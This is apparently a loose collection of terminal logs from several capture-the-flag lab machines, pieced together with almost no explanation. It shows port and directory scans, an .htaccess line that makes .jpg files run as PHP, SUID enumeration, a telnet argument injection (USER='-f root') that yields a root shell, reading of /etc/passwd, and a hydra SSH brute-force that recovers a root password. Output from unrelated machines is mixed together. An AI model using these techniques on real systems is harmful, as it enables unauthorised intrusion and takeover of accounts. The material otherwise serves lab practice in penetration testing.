[20:06:24] 403 -  276B  - /.htaccess.save
[20:06:24] 403 -  276B  - /.htaccess_orig
[20:06:24] 403 -  276B  - /.htaccess_extra
[20:06:24] 403 -  276B  - /.htaccessBAK
[20:06:24] 403 -  276B  - /.htaccess_sc
[20:06:24] 403 -  276B  - /.htaccessOLD
[20:06:24] 403 -  276B  - /.htaccessOLD2
[20:06:24] 403 -  276B  - /.htm
[20:06:24] 403 -  276B  - /.html
[20:06:24] 403 -  276B  - /.htpasswd_test
[20:06:24] 403 -  276B  - /.htpasswds
[20:06:24] 403 -  276B  - /.httr-oauth
[20:06:26] 403 -  276B  - /.php
[20:07:04] 403 -  276B  - /server-status
[20:07:04] 403 -  276B  - /server-status/
[20:07:13] 301 -  312B  - /uploads  ->  http://tmpfile.dsz/uploads/
[20:07:13] 200 -  454B  - /uploads/

AddType application/x-httpd-php .jpg

cat user.txt 
flag{user-c2fdb0243cc742b18dcb4e5e68eed318}

find / -user root -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

ps -ef
#或者
ss -tlnup

Eecho@Happiness:~$ USER='-f root';busybox telnet -a 127.0.0.1 23

Entering character mode
Escape character is '^]'.


Linux 4.19.0-27-amd64 (localhost) (pts/1)

Last login: Thu Jan 22 23:44:10 EST 2026 from 192.168.1.12 on pts/0
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@Happiness:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Happiness:~# cd /root
root@Happiness:~# ls -l
total 4
-rw-r--r-- 1 root root 44 Jan 22 12:59 root.txt
root@Happiness:~# cat root.txt 
flag{root-b52bb1635e544c3f968822ab6c7a745d}

☁  ~  nmap -sVC -p- 192.168.43.22            
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-27 13:48 CST
Nmap scan report for Hellman (192.168.43.22)
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 10.0 (protocol 2.0)
80/tcp   open  http    nginx
|_http-title: Diffie-Hellman Challenge Guide
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines, NULL: 
|     Alice has sent you her public key.
|     You've also been given your private key.
|     calculate your shared secret.
|     2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
|     83718076477540133697440395120117835062181904167228720512476185863669857584047
|     212342370420933673207864818760960324446462215689498300223051341779379473245095051006710080216230349918786430922058134497158989814626884030339600682340156150947173905751911455609989553852462040979814548021746725865844131953108133
|   GetRequest: 
|     Alice has sent you her public key.
|     You've also been given your private key.
|     calculate your shared secret.
|     2410312426921032588552076022197566074856950548502459942654116941958108831682612228890093858261341614673227141477904012196503648957050582631942730706805009223062734745341073406696246014589361659774041027169249453200378729434170325843778659198143763193776859869524088940195577346119843545301547043747207749969763750084308926339295559968882457872412993810129130294592999947926365264059284647209730384947211681434464714438488520940127459844288859336526896320919633919
|     33715088859495353754210093143765893163188054236512902547692153953800870588417
|_    481309894595139895576935804649545675026888596928312834425647619101039796093993856630859979042427315278439553195674311107889704665097834902532403378354040871082687754961566673252155492208765899193527551492165178606420001437506971

alan@memory:~$ sudo -l
Matching Defaults entries for alan on memory:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User alan may run the following commands on memory:
    (root) NOPASSWD: /usr/bin/wormhole

alan@memory:~$ sudo /usr/bin/wormhole --help
Usage: wormhole [OPTIONS] COMMAND [ARGS]...

  Create a Magic Wormhole and communicate through it.

  Wormholes are created by speaking the same magic CODE in two different
  places at the same time.  Wormholes are secure against anyone who doesn't
  use the same code.

Options:
  --appid APPID                   appid to use
  --relay-url URL                 rendezvous relay to use
  --transit-helper tcp:HOST:PORT  transit relay to use
  --dump-timing FILE.json         (debug) write timing data to file
  --version                       Show the version and exit.
  --help                          Show this message and exit.

Commands:
  help
  receive  Receive a text message, file, or directory (from 'wormhole send')
  send     Send a text message, file, or directory
  ssh      Facilitate sending/receiving SSH public keys

┌──(root㉿kali)-[~]
└─# arp-scan -l             
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.3.1     18:d9:8f:c8:68:38       Huawei Device Co., Ltd.
192.168.3.4     00:e0:4c:4d:2a:68       REALTEK SEMICONDUCTOR CORP.
192.168.3.5     b4:2e:99:cc:28:45       GIGA-BYTE TECHNOLOGY CO.,LTD.
192.168.3.192   08:00:27:99:e3:83       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# nmap -p- -A -sVC 192.168.3.192     
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 11:44 CST
Nmap scan report for 192.168.3.192
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:99:E3:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.3.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds

root@kali:~                                                                                                      ▶ dirsearch -u http://dev.moodle.dsz -i 200                                                                      
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_dev.moodle.dsz/_26-01-13_22-01-23.txt

Target: http://dev.moodle.dsz/

[22:01:23] Starting: 
[22:01:48] 200 -   74MB - /backup.tar.gz

Task Completed

curl -O http://dev.moodle.dsz/backup.tar.gz

www-data@Moodle:/opt$ cat hint.txt
cat hint.txt
root 的凭证隐藏在众目睽睽之下
// ^[a-zA-Z0-9]{20}$

www-data@Moodle:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
kotori:x:1000:1000:,,,:/home/kotori:/bin/bash
www-data@Moodle:/tmp$ 

kotori@Moodle:~$ grep -raohE '\b[a-zA-Z0-9]{20}\b' /etc /var/www /opt /home 2>/dev/null >> a.txt
kotori@Moodle:~$ ls -l
total 1444
-rw-r--r-- 1 kotori kotori 1135334 Jan 13 09:46 a.txt
-rw-r--r-- 1 kotori kotori  332111 Apr 17  2023 linpeas.sh
-rw-r--r-- 1 root   root        44 Dec 26 22:22 user.txt

hydra -t 4 -l root -P a.txt -I -f -vV 192.168.3.192 ssh
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-13 22:52:46
[DATA] max 4 tasks per 1 server, overall 4 tasks, 54060 login tries (l:1/p:54060), ~13515 tries per task
[DATA] attacking ssh://192.168.3.192:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.3.192:22
[INFO] Successful, password authentication is supported by ssh://192.168.3.192:22
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 1 of 54060 [child 0] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "GetServerInformation" - 2 of 54060 [child 1] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 3 of 54060 [child 2] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 4 of 54060 [child 3] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "klanguageoverridesrc" - 5 of 54060 [child 0] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "drmGetMinorNameForFD" - 6 of 54060 [child 1] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "sF6Kfzr69w7dyZALAhl6" - 7 of 54060 [child 3] (0/0)
[ATTEMPT] target 192.168.3.192 - login "root" - pass "PubkeyAuthentication" - 8 of 54060 [child 2] (0/0)
[22][ssh] host: 192.168.3.192   login: root   password: sF6Kfzr69w7dyZALAhl6
[STATUS] attack finished for 192.168.3.192 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-13 22:52:50

kotori@Moodle:~$ su
Password: 
root@Moodle:/home/kotori# ls
a.txt  linpeas.sh  user.txt
root@Moodle:/home/kotori# id
uid=0(root) gid=0(root) groups=0(root)
root@Moodle:/home/kotori# cat user.txt 
flag{user-de7202216bc84a6aa04762061c9e9ad2}
root@Moodle:/home/kotori# cd /root
root@Moodle:~# ls
rootpass.txt  root.txt
root@Moodle:~# cat root.txt 
flag{root-ea6233d6aa262b93419775a51a8cc1df}

kotori@Moodle:~$ cat .bash_history 
last
exit
ls al
ls- al
wget 192.168.3.94/linpeas.sh
bash linpeas.sh 
exit

kotori@Moodle:~$ last -F -i -w
kotori   pts/1        192.168.3.48     Tue Jan 13 09:45:18 2026   still logged in
reboot   system boot  0.0.0.0          Tue Jan 13 08:45:58 2026   still running
root     pts/0        192.168.3.94     Fri Dec 26 23:13:35 2025 - crash                    (17+09:32)
reboot   system boot  0.0.0.0          Fri Dec 26 23:13:00 2025   still running
sF6Kfzr69w7dyZALAhl6 pts/1        192.168.3.94  
·······

☁  ~  nmap -sVC -p- 192.168.3.52             
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 19:40 CST
Nmap scan report for 192.168.3.52
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0 (protocol 2.0)
80/tcp open  http    nginx
|_http-title: 403 Forbidden
| http-robots.txt: 3 disallowed entries 
|_/admin/ /backup/ /*-logs/
MAC Address: 08:00:27:54:7B:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

☁  ~  feroxbuster -u http://192.168.3.52
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.3.52/
 🚩  In-Scope Url          │ 192.168.3.52
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       11w      146c http://192.168.3.52/backup
404      GET        7l       11w      146c http://192.168.3.52/admin
404      GET        7l       11w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l        9w      146c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
[####################] - 12s    30002/30002   0s      found:2       errors:0      
[####################] - 12s    30000/30000   2549/s  http://192.168.3.52/    

☁  ~  ffuf -u http://192.168.3.52/FUZZ-logs -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -fc 404


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.3.52/FUZZ-logs
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________

mosh                    [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 4ms]
:: Progress: [56162/56162] :: Job [1/1] :: 3278 req/sec :: Duration: [0:00:22] :: Errors: 0 ::

☁  ~  ffuf -u http://192.168.3.52/mosh-logs/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -e .txt,.php,.log -fc 404

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.3.52/mosh-logs/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
 :: Extensions       : .txt .php .log 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________

reminder                [Status: 200, Size: 37, Words: 2, Lines: 2, Duration: 14ms]
:: Progress: [224648/224648] :: Job [1/1] :: 2816 req/sec :: Duration: [0:01:36] :: Errors: 0 ::

python3 gen_wordlist.py > time_wordlist.txt
ffuf -u http://192.168.43.224/mosh-logs/FUZZ -w time_wordlist.txt -fc 404

☁  mosh  ffuf -u http://192.168.3.52/mosh-logs/FUZZ -w word_list.txt -fc 404

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.3.52/mosh-logs/FUZZ
 :: Wordlist         : FUZZ: /root/localkali/mytarget/mosh/word_list.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________

2026-01-27_21-00-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 25ms]
2026-01-27_21-01-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 8ms]
2026-01-27_21-02-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 50ms]
2026-01-27_21-03-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 29ms]
2026-01-27_21-04-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 13ms]
2026-01-27_21-06-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 7ms]
2026-01-27_21-07-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 15ms]
2026-01-27_21-05-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 162ms]
2026-01-27_21-08-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 36ms]
2026-01-27_21-09-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 2ms]
2026-01-27_21-10-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 5ms]
2026-01-27_21-11-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 1ms]
2026-01-27_21-12-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 2ms]
2026-01-27_21-13-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 4ms]
2026-01-27_21-14-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 13ms]
2026-01-27_21-16-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 26ms]
2026-01-27_21-15-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 57ms]
2026-01-27_21-17-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 33ms]
2026-01-27_21-18-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 18ms]
2026-01-27_21-19-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 16ms]
2026-01-27_21-20-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 7ms]
2026-01-27_21-21-00.log [Status: 200, Size: 125, Words: 17, Lines: 4, Duration: 6ms]
2026-01-27_21-22-00.log [Status: 200, Size: 374, Words: 45, Lines: 10, Duration: 14ms]
:: Progress: [3601/3601] :: Job [1/1] :: 3174 req/sec :: Duration: [0:00:02] :: Errors: 0 ::